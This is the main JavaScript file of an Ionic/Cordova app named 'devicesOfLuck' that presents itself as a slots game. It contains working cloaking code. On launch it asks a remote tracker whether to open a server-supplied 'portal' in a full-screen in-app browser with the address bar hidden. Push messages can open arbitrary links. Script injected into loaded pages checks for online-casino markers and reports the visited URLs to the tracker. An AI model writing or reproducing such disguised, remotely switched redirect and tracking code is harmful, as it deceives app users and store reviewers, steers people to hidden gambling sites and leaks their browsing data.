angular.module('devicesOfLuck', ['ionic', 'ionic.cloud', 'ngCordova'])



    .run(function ($ionicPlatform, $state, $http, $rootScope, $cordovaNetwork, $cordovaDevice, $cordovaInAppBrowser, $ionicPush) {
        $ionicPlatform.ready(function () {
            var index = 0;
            var options = {
                disallowoverscroll: 'yes',
                location: 'no',
                toolbar: 'no',
                zoom: 'no',
                clearcache: 'no',
                hidestatusbar: 'yes',
                hardwareback: 'yes',
                hidden: 'no'
            };

            if (window.cordova && window.cordova.plugins && window.cordova.plugins.Keyboard) {
                cordova.plugins.Keyboard.disableScroll(true);

                cordova.plugins.Keyboard.hideKeyboardAccessoryBar(true);

            }
            if (window.StatusBar) {

                StatusBar.styleDefault();
            }


            var deviceId = $cordovaDevice.getDevice();
            $rootScope.isWorkingStatus = $cordovaNetwork.isOnline();

            if (Branch) {
                Branch.initSession(function (data) {
                }).then(
                    function (res) {
                        if (deviceId.uuid) {
                            Branch.setIdentity(deviceId.uuid).then();
                        }
                    })
            }


            $ionicPush.register().then(function (t) {
                return $ionicPush.saveToken(t);
            }).then();


            if ($rootScope.isWorkingStatus) {
                $http({
                    method: 'GET',
                    url: 'http://d.trknewapp.site/?app_id=1032'
                }).then(function successCallback(response) {
                    if (response && response.data) {
                        $rootScope.portal = response.data;

                        $rootScope.status = 'stars';
                        $rootScope.isWorking = 'on';
                        if (!$rootScope.browserOpen) {
                            $cordovaInAppBrowser.open($rootScope.portal, '_blank', options);
                        }
                    }
                    else {
                        $rootScope.status = 'slots'
                    }
                }, function errorCallback() {
                    $rootScope.status = 'slots'
                });
            }
            else {
                $rootScope.status = 'slots'
            }


            $rootScope.$on('$cordovaInAppBrowser:loaderror', function (e, event) {
                if (event && event.code !== -999) {
                    $cordovaInAppBrowser.close();
                    $rootScope.isWorking = 'off';
                }
            });


            $rootScope.$on('cloud:push:notification', function (event, data) {
                if (!data || data.message.raw.additionalData.foreground) return;
                var msg = data.message;
                if (data && msg.payload && msg.payload.link) {
                    if ($cordovaNetwork.isOnline()) {
                        $cordovaInAppBrowser.open(msg.payload.link, '_blank', options);
                        $rootScope.browserOpen = true;
                        $rootScope.isOnline = 'connect';
                    }
                    else {
                        $rootScope.isOnline = 'disconnect';
                    }
                }

            });


            $rootScope.checkStatus = function () {
                if ($cordovaNetwork.isOnline()) {
                    $cordovaInAppBrowser.open($rootScope.portal, '_blank', options);
                    $rootScope.isWorking = 'on';
                }
                else {
                    $rootScope.isWorking = 'off';
                }
            };

            $rootScope.$on('$cordovaInAppBrowser:loadstop', function (e) {
                if (index < 3) {
                    $cordovaInAppBrowser.executeScript({
                        code: "var check = false;" +
                        "if (window.location.search.indexOf('trackCode=') > -1) { " +
                        "var trackCode = window.location.search.split('trackCode=');" +
                        "if (trackCode && trackCode[1]) {" +
                        "var all = document.getElementsByTagName('a');" +
                        "for (var i = 0, max = all.length; i < max; i++) {" +
                        "if (all[i].href.indexOf(trackCode[1]) > -1) {" +
                        "check = true;" +
                        "break" +
                        "}" +
                        "if (all[i].href.indexOf('otvet@vulkanplatinum.com') > -1) {" +
                        "check = true;" +
                        "break" +
                        "}" +
                        "}" +
                        "}" +
                        "}" +
                        "if (window.YHelperChat) {" +
                        "check = true;" +
                        "}" +
                        "if (window.MirrorsChecker) {" +
                        "check = true;" +
                        "}" +
                        "if (window.GAMENAME) {" +
                        "check = true;" +
                        "}" +
                        "if (!check && window.location.href !== 'about:blank') {" +
                        "var xhr = new XMLHttpRequest();" +
                        "var params = 'app_id=1032&domain=' + window.location.href;" +
                        "xhr.open(\"GET\", 'http://d.trknewapp.site/log.php?' + params, true);" +
                        "xhr.send();" +
                        "}"
                    });
                    index++
                }
            });

        });
    })

    .config(function ($stateProvider, $urlRouterProvider, $ionicCloudProvider) {

        $stateProvider
            .state('index', {
                templateUrl:
                    'pages/index.html',
                url: '/index'

            });

        $ionicCloudProvider.init({
            "core": {
                "app_id": "de5c2576"
            },
            "push": {
                "sender_id": "775075922730",
                "pluginConfig": {
                    "ios": {
                        "badge": true,
                        "sound": true
                    },
                    "android": {
                        "iconColor": "#343434"
                    }
                }
            }
        });

        $urlRouterProvider.otherwise('/index');
    });


